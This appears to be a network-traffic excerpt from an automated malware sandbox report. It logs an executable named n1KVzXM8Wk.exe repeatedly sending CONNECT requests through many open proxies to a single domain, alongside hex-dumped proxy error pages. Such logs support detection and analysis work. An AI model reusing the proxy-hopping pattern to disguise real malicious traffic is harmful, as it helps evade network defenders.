                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.049654961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1918192.168.2.455193114.132.202.8080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.051177979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.609448910 CET84INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Transfer-Encoding: chunked


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1919192.168.2.455248188.234.147.5480196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.173265934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1920192.168.2.455223175.183.82.22181976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.173463106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1921192.168.2.455265104.244.75.78315346812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.189465046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1922192.168.2.45529343.153.81.604436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.190069914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1923192.168.2.45342277.242.235.3541536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.190427065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1924192.168.2.455211103.134.38.8956786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.218971968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1925192.168.2.453434107.180.101.18270536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.376441002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.475284100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475215912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1926192.168.2.453601107.180.95.17714056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.376694918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1927192.168.2.453485192.169.226.96316406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.376861095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1928192.168.2.453568188.164.193.17870016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.377213955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.943624973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557704926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.647257090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.858808994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1929192.168.2.455230139.129.162.6531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.377432108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.741786957 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/3.3.8
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 3485
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;b


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1930192.168.2.45531445.144.30.1994436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.377916098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1931192.168.2.45354969.75.140.15780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.388492107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.644165993 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1932192.168.2.45360851.210.45.148418556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.403299093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1933192.168.2.454958117.160.250.16399906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.403367996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.321804047 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1934192.168.2.455280184.170.248.541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.425664902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1935192.168.2.453677159.223.166.21455376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.425838947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.475327015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475229025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.474920988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:57.474878073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:09.490560055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1936192.168.2.453470172.235.10.53806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.435715914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.537712097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.647078037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.285068989 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:40 GMT
                                                                                                      Server: case1
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 535
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 61 6a 61 6e 65 65 73 68 6d 40 67 6f 69 74 64 65 76 2e 63 6f 6d 20 74 6f
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at rajaneeshm@goitdev.com to
                                                                                                      Feb 23, 2024 09:45:40.285111904 CET203INData Raw: 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20
                                                                                                      Data Ascii: inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1937192.168.2.453510154.236.179.22919816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.435909986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1938192.168.2.453456188.132.222.680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.436099052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.475461006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475229025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1939192.168.2.455287178.54.21.20380816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.480968952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1940192.168.2.455303130.162.213.17580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.492883921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.777237892 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                                      Server: squid/6.2-VCS
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1112
                                                                                                      X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 53 68 69 65 6c 64 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 6f 72 77 61 72 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 75 70 73 74 72 65 61 6d 2e 2e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 